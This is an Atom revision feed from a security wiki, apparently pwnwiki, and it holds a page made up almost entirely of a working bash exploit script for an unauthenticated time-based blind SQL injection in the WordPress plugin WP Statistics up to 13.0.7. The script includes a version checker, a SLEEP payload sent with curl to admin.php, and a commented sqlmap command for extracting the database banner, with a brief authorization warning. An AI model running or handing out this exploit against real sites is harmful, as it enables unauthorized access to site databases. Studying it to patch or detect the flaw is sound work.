<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=WordPress_Plugin_WP_Statistics_13.0.7_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E</id>
	<title>WordPress Plugin WP Statistics 13.0.7 SQL注入漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=WordPress_Plugin_WP_Statistics_13.0.7_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=WordPress_Plugin_WP_Statistics_13.0.7_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-15T10:24:16Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=WordPress_Plugin_WP_Statistics_13.0.7_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=3052&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated) # Date: 20/05/2021 # Exploit Author: Mansoor R (@time4s...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=WordPress_Plugin_WP_Statistics_13.0.7_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=3052&amp;oldid=prev"/>
		<updated>2021-05-22T02:50:08Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated) # Date: 20/05/2021 # Exploit Author: Mansoor R (@time4s...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated)&lt;br /&gt;
# Date: 20/05/2021&lt;br /&gt;
# Exploit Author: Mansoor R (@time4ster)&lt;br /&gt;
# CVSS Score: 7.5 (High)&lt;br /&gt;
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N&lt;br /&gt;
# Version Affected: 13.0 to 13.0.7&lt;br /&gt;
# Vendor URL: https://wordpress.org/plugins/wp-statistics/&lt;br /&gt;
# Patch: Upgrade to wp-statistics 13.0.8 (or above)&lt;br /&gt;
# Tested On: wp-statistics 13.0.6,13.0.7&lt;br /&gt;
&lt;br /&gt;
#!/bin/bash&lt;br /&gt;
&lt;br /&gt;
# Credits: &lt;br /&gt;
# https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/&lt;br /&gt;
&lt;br /&gt;
# SQLmap Exploit for grepping database banner (automated):&lt;br /&gt;
# sqlmap -u &amp;quot;http://192.168.1.54/wordpress/wp-admin/admin.php?ID=1&amp;amp;page=wps_pages_page&amp;amp;type=1&amp;quot; --techniqu=T --dbms=&amp;quot;mysql&amp;quot; -p &amp;quot;ID&amp;quot; -b&lt;br /&gt;
&lt;br /&gt;
# WARNINGS: &lt;br /&gt;
# Only test the exploit on websites you are authorized to.&lt;br /&gt;
# The exploit will perform sleep for 3 seconds. Don't use on production server of organization without prior permissions.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# Exploit&lt;br /&gt;
# ==============&lt;br /&gt;
&lt;br /&gt;
echo&lt;br /&gt;
echo &amp;quot;============================================================================================&amp;quot;&lt;br /&gt;
echo &amp;quot;Unauthenticated Time-Based Blind SQL Injection in WP Statistics &amp;lt; 13.0.8&amp;quot;&lt;br /&gt;
echo&lt;br /&gt;
echo &amp;quot;By: Mansoor R (@time4ster)&amp;quot;&lt;br /&gt;
echo &amp;quot;============================================================================================&amp;quot;&lt;br /&gt;
echo&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
function printHelp()&lt;br /&gt;
{&lt;br /&gt;
	echo -e &amp;quot;&lt;br /&gt;
Usage:&lt;br /&gt;
&lt;br /&gt;
-u|--wp-url      &amp;lt;string&amp;gt;		Wordpress target url&lt;br /&gt;
-k|--check				Only checks whether vulnerable version of plugin is running or not.&lt;br /&gt;
-h|--help				Print Help menu&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Example:&lt;br /&gt;
./wp-statistics-exploit.sh --wp_url https://www.example.com/wordpress &lt;br /&gt;
./wp-statistics-exploit.sh --wp_url https://www.example.com/wordpress --check&lt;br /&gt;
&amp;quot;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
#Processing arguments&lt;br /&gt;
check=&amp;quot;false&amp;quot;&lt;br /&gt;
exploit=&amp;quot;true&amp;quot;&lt;br /&gt;
while [[ &amp;quot;$#&amp;quot; -gt 0 ]]&lt;br /&gt;
do&lt;br /&gt;
key=&amp;quot;$1&amp;quot;&lt;br /&gt;
&lt;br /&gt;
case &amp;quot;$key&amp;quot; in&lt;br /&gt;
    -u|--wp-url)&lt;br /&gt;
	    wp_url=&amp;quot;$2&amp;quot;&lt;br /&gt;
	    shift&lt;br /&gt;
	    shift # past argument&lt;br /&gt;
	    ;;&lt;br /&gt;
    -k|--check)&lt;br /&gt;
	    check=&amp;quot;true&amp;quot;&lt;br /&gt;
	    exploit=&amp;quot;false&amp;quot;&lt;br /&gt;
	    shift&lt;br /&gt;
	    shift&lt;br /&gt;
	    ;;&lt;br /&gt;
    -h|--help)&lt;br /&gt;
	    printHelp&lt;br /&gt;
	    exit&lt;br /&gt;
	    shift&lt;br /&gt;
	    ;;&lt;br /&gt;
    *)   &lt;br /&gt;
	    echo [-] Enter valid options&lt;br /&gt;
	    exit&lt;br /&gt;
	    ;;&lt;br /&gt;
esac&lt;br /&gt;
done&lt;br /&gt;
&lt;br /&gt;
[[ -z &amp;quot;$wp_url&amp;quot; ]] &amp;amp;&amp;amp; echo &amp;quot;[-] Supply wordpress target URL. Use -h for help menu.&amp;quot; &amp;amp;&amp;amp; exit&lt;br /&gt;
&lt;br /&gt;
function checkVersion()&lt;br /&gt;
{&lt;br /&gt;
	url=&amp;quot;$1&amp;quot;&lt;br /&gt;
	[[ -z &amp;quot;$url&amp;quot; ]] &amp;amp;&amp;amp; return&lt;br /&gt;
	target_endpoint=&amp;quot;$url/wp-content/plugins/wp-statistics/readme.txt&amp;quot;&lt;br /&gt;
	user_agent=&amp;quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36&amp;quot;&lt;br /&gt;
&lt;br /&gt;
	version=$(curl -ks --max-time 5 --user-agent &amp;quot;$user_agent&amp;quot; &amp;quot;$target_endpoint&amp;quot; | grep -i -m 1 &amp;quot;stable tag:&amp;quot; | grep -o -E &amp;quot;[0-9]+\.[0-9]+\.[0-9]+&amp;quot;)&lt;br /&gt;
	[[ -n &amp;quot;$version&amp;quot; ]] &amp;amp;&amp;amp; echo &amp;quot;[+] WP-statistical Plugin Version: $version&amp;quot; &lt;br /&gt;
	[[ -z &amp;quot;$version&amp;quot; ]] &amp;amp;&amp;amp; echo &amp;quot;[-] WP-statistical Unable to detect version.&amp;quot; &amp;amp;&amp;amp; return&lt;br /&gt;
&lt;br /&gt;
	vuln_version=(13.0.7 13.0.6 13.0.5 13.0.4 13.0.3 13.0.1 13.0)&lt;br /&gt;
	is_vulnerable=&amp;quot;false&amp;quot;&lt;br /&gt;
	for v in &amp;quot;${vuln_version[@]}&amp;quot;;do &lt;br /&gt;
		[[ &amp;quot;$version&amp;quot; == &amp;quot;$v&amp;quot; ]] &amp;amp;&amp;amp; is_vulnerable=&amp;quot;true&amp;quot; &amp;amp;&amp;amp; break	&lt;br /&gt;
	done&lt;br /&gt;
	[[ &amp;quot;$is_vulnerable&amp;quot; == &amp;quot;true&amp;quot; ]] &amp;amp;&amp;amp; echo &amp;quot;[++] Target $url is Vulnerable&amp;quot;&lt;br /&gt;
	[[ &amp;quot;$is_vulnerable&amp;quot; == &amp;quot;false&amp;quot; ]] &amp;amp;&amp;amp; echo &amp;quot;[--] Target $url is  Not Vulnerable&amp;quot;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
function exploitPlugin()&lt;br /&gt;
{&lt;br /&gt;
	url=&amp;quot;$1&amp;quot;&lt;br /&gt;
	target_endpoint=&amp;quot;$url/wp-admin/admin.php&amp;quot;&lt;br /&gt;
	user_agent=&amp;quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36&amp;quot;&lt;br /&gt;
	sleep=3&lt;br /&gt;
	payload=&amp;quot;ID=1 AND (SELECT * from (select SLEEP($sleep))a)&amp;quot;&lt;br /&gt;
	&lt;br /&gt;
	echo -e -n &amp;quot;[!] Caution: You are going to execute sleep database command for $sleep seconds. Proceed only if you have permission.\nPress (Y/y) to continue or any other key to exit: &amp;quot;&lt;br /&gt;
	read choice&lt;br /&gt;
	[[ &amp;quot;$choice&amp;quot; != &amp;quot;y&amp;quot; ]] &amp;amp;&amp;amp; [[ &amp;quot;$choice&amp;quot; != &amp;quot;Y&amp;quot; ]] &amp;amp;&amp;amp; return&lt;br /&gt;
&lt;br /&gt;
	echo&lt;br /&gt;
	echo &amp;quot;[+] Trying Payload:&amp;quot;	&lt;br /&gt;
	set -x&lt;br /&gt;
	curl -v -ks -G --user-agent &amp;quot;$user_agent&amp;quot; &amp;quot;$target_endpoint&amp;quot; \&lt;br /&gt;
		--data-urlencode &amp;quot;page=wps_pages_page&amp;quot; \&lt;br /&gt;
		--data-urlencode &amp;quot;type=1&amp;quot; \&lt;br /&gt;
		--data-urlencode &amp;quot;$payload&amp;quot;&lt;br /&gt;
	&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
[[ &amp;quot;$check&amp;quot; == &amp;quot;true&amp;quot; ]] &amp;amp;&amp;amp; checkVersion &amp;quot;$wp_url&amp;quot;&lt;br /&gt;
[[ &amp;quot;$exploit&amp;quot; == &amp;quot;true&amp;quot; ]] &amp;amp;&amp;amp; exploitPlugin &amp;quot;$wp_url&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>